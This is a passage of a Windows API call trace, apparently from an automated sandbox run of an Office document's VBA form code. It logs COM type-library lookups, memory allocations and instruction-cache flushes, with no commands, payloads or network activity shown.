This=0x6d26e58, pUnkSink=0x6c2d948, pdwCookie=0x186098 | out: pdwCookie=0x186098*=0xffffffff) returned 0x0 [0042.028] UserForm:IUnknown:Release (This=0x6d26e58) returned 0x0 [0042.028] IConnectionPoint:Advise (in: This=0x6d26e58, pUnkSink=0x6c2d950, pdwCookie=0x186098 | out: pdwCookie=0x186098*=0xffffffff) returned 0x0 [0042.028] UserForm:IUnknown:Release (This=0x6d26e58) returned 0x0 [0042.028] IConnectionPoint:Advise (in: This=0x6d26e58, pUnkSink=0x6c2d958, pdwCookie=0x186098 | out: pdwCookie=0x186098*=0xffffffff) returned 0x0 [0042.028] UserForm:IUnknown:Release (This=0x6d26e58) returned 0x0 [0042.028] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45cd7a0*(Data1=0xf27be360, Data2=0x1b98, Data3=0x11cf, Data4=([0]=0x84, [1]=0xfc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa7, [6]=0x1d, [7]=0xcb)), ppvObject=0x186118 | out: ppvObject=0x186118*=0x0) returned 0x80004002 [0042.028] UserForm:IUnknown:Release (This=0x3c033c0) returned 0x0 [0042.029] DispCallFunc (pvInstance=0x6c2d930, oVft=0x38, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x185070) [0042.029] IMalloc:Realloc (This=0x7feffc15380, pv=0x3e42280, cb=0x800) returned 0x66ebcc0 [0042.029] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x30) returned 0x6880f70 [0042.029] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x5e70000 [0042.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6ad5f74, cbMultiByte=1, lpWideCharStr=0x5e700dc, cchWideChar=4 | out: lpWideCharStr=" ") returned 1 [0042.030] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x200) returned 0x6cb92a0 [0042.030] IUnknown:Release (This=0x6a6e8e8) returned 0x5 [0042.030] IUnknown:Release (This=0x6a6e948) returned 0x4 [0042.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2bc2, cbMultiByte=10, lpWideCharStr=0x183270, cchWideChar=11 | out: lpWideCharStr="UserForm1") returned 10 [0042.030] ITypeComp:RemoteBind (in: This=0x6a6e8f0, szName="UserForm1", lHashVal=0x10d629, wFlags=0x3, ppTInfo=0x183228, pDescKind=0x18323c, ppFuncDesc=0x183240, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x183228*=0x0, pDescKind=0x18323c*=0, ppFuncDesc=0x183240, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.031] IMalloc:Realloc (This=0x7feffc15380, pv=0x6cb9090, cb=0x400) returned 0x3e42280 [0042.031] IUnknown:Release (This=0x6a6e8e8) returned 0x5 [0042.031] IUnknown:Release (This=0x6a6e948) returned 0x4 [0042.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2e0e, cbMultiByte=6, lpWideCharStr=0x183150, cchWideChar=7 | out: lpWideCharStr="Text1") returned 6 [0042.031] ITypeComp:RemoteBind (in: This=0x6a6e8f0, szName="Text1", lHashVal=0x107eb3, wFlags=0x3, ppTInfo=0x183108, pDescKind=0x18311c, ppFuncDesc=0x183120, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x183108*=0x6a6e8e8, pDescKind=0x18311c*=1, ppFuncDesc=0x183120, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.031] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x183110, pDummy=0x1 | out: ppTypeAttr=0x183110, pDummy=0x1) returned 0x0 [0042.031] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.031] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e8e8, hreftype=0x25, ppTInfo=0x1829c8 | out: ppTInfo=0x1829c8*=0x6ceee08) returned 0x0 [0042.031] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182b98 | out: ppvObject=0x182b98*=0x0) returned 0x80004002 [0042.031] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x182a18, pDummy=0x10 | out: ppTypeAttr=0x182a18, pDummy=0x10) returned 0x0 [0042.031] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0042.031] IUnknown:Release (This=0x6ceee08) returned 0x3 [0042.031] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182ec0, pDummy=0x0 | out: ppTypeAttr=0x182ec0, pDummy=0x0) returned 0x0 [0042.031] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.031] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x182f70 | out: ppvObject=0x182f70*=0x6a6e8e8) returned 0x0 [0042.031] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6a6e8e8, memid=2002, invkind=2, pFuncIndex=0x182fb0 | out: pFuncIndex=0x182fb0*=0x0) returned 0x0 [0042.031] ITypeInfo2:GetFuncCustData (in: This=0x6a6e8e8, index=0x0, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x182fc8 | out: pVarVal=0x182fc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x183070, varVal2=0x6b7ed80)) returned 0x0 [0042.031] IUnknown:Release (This=0x6a6e8e8) returned 0x5 [0042.031] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182f28 | out: ppvObject=0x182f28*=0x0) returned 0x80004002 [0042.031] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182e00 | out: ppvObject=0x182e00*=0x0) returned 0x80004002 [0042.031] IUnknown:Release (This=0x6ceee08) returned 0x3 [0042.031] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182f28 | out: ppvObject=0x182f28*=0x0) returned 0x80004002 [0042.032] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182e00 | out: ppvObject=0x182e00*=0x0) returned 0x80004002 [0042.032] IUnknown:Release (This=0x6ceee08) returned 0x3 [0042.032] IUnknown:AddRef (This=0x6a6e8e8) returned 0x6 [0042.032] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e8e8) returned 0x0 [0042.032] IUnknown:Release (This=0x6a6e8e8) returned 0x5 [0042.032] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183288 | out: ppvObject=0x183288*=0x0) returned 0x80004002 [0042.032] IUnknown:AddRef (This=0x6a6e8e8) returned 0x6 [0042.032] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183200 | out: ppvObject=0x183200*=0x0) returned 0x80004002 [0042.032] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831d0 | out: ppvObject=0x1831d0*=0x0) returned 0x80004002 [0042.032] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831c0 | out: ppvObject=0x1831c0*=0x0) returned 0x80004002 [0042.032] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831c8 | out: ppvObject=0x1831c8*=0x0) returned 0x80004002 [0042.032] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x1831f8, pDummy=0x10 | out: ppTypeAttr=0x1831f8, pDummy=0x10) returned 0x0 [0042.032] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.032] IUnknown:AddRef (This=0x6a6e8e8) returned 0x7 [0042.032] IUnknown:Release (This=0x6a6e8e8) returned 0x6 [0042.032] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1833e8 | out: ppvObject=0x1833e8*=0x0) returned 0x80004002 [0042.032] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1833e0 | out: ppvObject=0x1833e0*=0x0) returned 0x80004002 [0042.032] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x183638, pDummy=0x0 | out: ppTypeAttr=0x183638, pDummy=0x0) returned 0x0 [0042.032] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.032] IUnknown:Release (This=0x6a6e8e8) returned 0x6 [0042.032] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.032] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.032] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182bd0, pDummy=0x0 | out: ppTypeAttr=0x182bd0, pDummy=0x0) returned 0x0 [0042.032] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.032] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1835c0 | out: ppvObject=0x1835c0*=0x0) returned 0x80004002 [0042.032] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183590 | out: ppvObject=0x183590*=0x0) returned 0x80004002 [0042.032] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183580 | out: ppvObject=0x183580*=0x0) returned 0x80004002 [0042.032] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183588 | out: ppvObject=0x183588*=0x0) returned 0x80004002 [0042.032] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1835b8, pDummy=0x10 | out: ppTypeAttr=0x1835b8, pDummy=0x10) returned 0x0 [0042.032] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0042.032] IUnknown:AddRef (This=0x6ceee08) returned 0x5 [0042.032] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.033] IUnknown:Release (This=0x6ceeeb8) returned 0x3 [0042.033] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.033] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183368 | out: ppvObject=0x183368*=0x0) returned 0x80004002 [0042.033] IUnknown:AddRef (This=0x6ceeeb8) returned 0x5 [0042.033] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x183360, pDummy=0x10 | out: ppTypeAttr=0x183360, pDummy=0x10) returned 0x0 [0042.033] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.033] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceeeb8, index=0x0, pRefType=0x183358 | out: pRefType=0x183358*=0x1302) returned 0x0 [0042.033] ITypeInfo:GetRefTypeInfo (in: This=0x6ceeeb8, hreftype=0x1302, ppTInfo=0x183370 | out: ppTInfo=0x183370*=0x6ceef68) returned 0x0 [0042.033] IUnknown:Release (This=0x6ceeeb8) returned 0x4 [0042.033] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceef68, ppTypeAttr=0x183360, pDummy=0x183340 | out: ppTypeAttr=0x183360, pDummy=0x183340*=0x183380) returned 0x0 [0042.033] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceef68) returned 0x0 [0042.033] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceef68, index=0x0, pRefType=0x183358 | out: pRefType=0x183358*=0xf) returned 0x0 [0042.033] ITypeInfo:GetRefTypeInfo (in: This=0x6ceef68, hreftype=0xf, ppTInfo=0x183370 | out: ppTInfo=0x183370*=0x6bbd1c8) returned 0x0 [0042.033] IUnknown:Release (This=0x6ceef68) returned 0x0 [0042.033] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x183360, pDummy=0x183338 | out: ppTypeAttr=0x183360, pDummy=0x183338*=0xf) returned 0x0 [0042.033] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0042.033] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0042.033] ITypeInfo:RemoteGetDocumentation (in: This=0x6ceeeb8, memid=0, refPtrFlags=0x1833e0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x430 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x430) returned 0x0 [0042.033] IUnknown:Release (This=0x6ceeeb8) returned 0x4 [0042.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Value", cchWideChar=6, lpMultiByteStr=0x1832f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Value", lpUsedDefaultChar=0x0) returned 6 [0042.033] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Value") returned 0x104be4 [0042.033] ITypeComp:RemoteBind (in: This=0x6ceeec0, szName="Value", lHashVal=0x104be4, wFlags=0x3, ppTInfo=0x1830e8, pDescKind=0x1830fc, ppFuncDesc=0x183100, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1830e8*=0x6ceeeb8, pDescKind=0x1830fc*=1, ppFuncDesc=0x183100, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.033] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x1830f0, pDummy=0x1 | out: ppTypeAttr=0x1830f0, pDummy=0x1) returned 0x0 [0042.034] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.034] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x182ea0, pDummy=0x0 | out: ppTypeAttr=0x182ea0, pDummy=0x0) returned 0x0 [0042.034] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.034] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x182f50 | out: ppvObject=0x182f50*=0x6ceeeb8) returned 0x0 [0042.034] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6ceeeb8, memid=0, invkind=2, pFuncIndex=0x182f90 | out: pFuncIndex=0x182f90*=0x5b) returned 0x0 [0042.034] ITypeInfo2:GetFuncCustData (in: This=0x6ceeeb8, index=0x5b, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x182fa8 | out: pVarVal=0x182fa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x183050, varVal2=0x6b7ed80)) returned 0x0 [0042.034] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.034] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.034] ITypeInfo:LocalReleaseFuncDesc (This=0x6ceeeb8) returned 0x0 [0042.034] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.034] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831a8 | out: ppvObject=0x1831a8*=0x0) returned 0x80004002 [0042.034] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.034] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183210 | out: ppvObject=0x183210*=0x0) returned 0x80004002 [0042.034] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831e0 | out: ppvObject=0x1831e0*=0x0) returned 0x80004002 [0042.034] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831d0 | out: ppvObject=0x1831d0*=0x0) returned 0x80004002 [0042.034] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831d8 | out: ppvObject=0x1831d8*=0x0) returned 0x80004002 [0042.034] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x183208, pDummy=0x10 | out: ppTypeAttr=0x183208, pDummy=0x10) returned 0x0 [0042.034] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.034] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.034] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.034] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1833f8 | out: ppvObject=0x1833f8*=0x0) returned 0x80004002 [0042.034] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1833f0 | out: ppvObject=0x1833f0*=0x0) returned 0x80004002 [0042.034] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.034] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x183648, pDummy=0x5e70718 | out: ppTypeAttr=0x183648, pDummy=0x5e70718*=0x0) returned 0x0 [0042.034] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.034] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.034] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.034] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.034] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x182be0, pDummy=0x0 | out: ppTypeAttr=0x182be0, pDummy=0x0) returned 0x0 [0042.034] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.035] IUnknown:Release (This=0x6a6e8e8) returned 0x7 [0042.035] IUnknown:Release (This=0x6a6e948) returned 0x6 [0042.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2e36, cbMultiByte=14, lpWideCharStr=0x183270, cchWideChar=15 | out: lpWideCharStr="CloseDateForm") returned 14 [0042.035] ITypeComp:RemoteBind (in: This=0x6a6e8f0, szName="CloseDateForm", lHashVal=0x1089d5, wFlags=0x1, ppTInfo=0x183228, pDescKind=0x18323c, ppFuncDesc=0x183240, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x183228*=0x0, pDescKind=0x18323c*=0, ppFuncDesc=0x183240, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.035] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b872f0, cb=0x80) returned 0x6ba0000 [0042.035] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ccfdf0, cb=0xa0) returned 0x6c29d20 [0042.035] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x10) returned 0x6c33bb0 [0042.035] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.035] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.035] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182b40, pDummy=0x0 | out: ppTypeAttr=0x182b40, pDummy=0x0) returned 0x0 [0042.035] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.035] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.035] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.035] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x182d80, pDummy=0x0 | out: ppTypeAttr=0x182d80, pDummy=0x0) returned 0x0 [0042.035] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.035] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0x11a) returned 0x6b20f00 [0042.035] IMalloc:Free (This=0x7feffc15380, pv=0x6cd0090) [0042.035] GetCurrentProcess () returned 0xffffffffffffffff [0042.035] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca11, dwSize=0x8) returned 1 [0042.035] GetCurrentProcess () returned 0xffffffffffffffff [0042.035] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca10, dwSize=0x8) returned 1 [0042.035] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc09, dwSize=0x8) returned 1 [0042.035] GetCurrentProcess () returned 0xffffffffffffffff [0042.035] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc08, dwSize=0x8) returned 1 [0042.035] GetCurrentProcess () returned 0xffffffffffffffff [0042.036] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc18, dwSize=0x2) returned 1 [0042.036] GetCurrentProcess () returned 0xffffffffffffffff [0042.036] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc6c, dwSize=0x45) returned 1 [0042.036] VirtualProtect (in: lpAddress=0x6cabc6c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18348c | out: lpflOldProtect=0x18348c*=0x40) returned 1 [0042.036] GetCurrentProcess () returned 0xffffffffffffffff [0042.036] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac46c, dwSize=0x45) returned 1 [0042.036] VirtualProtect (in: lpAddress=0x6cac46c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18348c | out: lpflOldProtect=0x18348c*=0x40) returned 1 [0042.036] GetCurrentProcess () returned 0xffffffffffffffff [0042.036] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4e9, dwSize=0x8) returned 1 [0042.036] GetCurrentProcess () returned 0xffffffffffffffff [0042.036] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4e8, dwSize=0x8) returned 1 [0042.036] GetCurrentProcess () returned 0xffffffffffffffff [0042.036] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4f8, dwSize=0x2) returned 1 [0042.036] GetCurrentProcess () returned 0xffffffffffffffff [0042.036] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac54c, dwSize=0x45) returned 1 [0042.036] VirtualProtect (in: lpAddress=0x6cac54c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18348c | out: lpflOldProtect=0x18348c*=0x40) returned 1 [0042.036] GetCurrentProcess () returned 0xffffffffffffffff [0042.036] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac5d4, dwSize=0x45) returned 1 [0042.036] VirtualProtect (in: lpAddress=0x6cac5d4, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18348c | out: lpflOldProtect=0x18348c*=0x40) returned 1 [0042.036] GetCurrentProcess () returned 0xffffffffffffffff [0042.036] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6b1, dwSize=0x8) returned 1 [0042.036] GetCurrentProcess () returned 0xffffffffffffffff [0042.036] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6b0, dwSize=0x8) returned 1 [0042.036] GetCurrentProcess () returned 0xffffffffffffffff [0042.036] FlushInstructionCache (hProcess=0xffffffffffffffff, 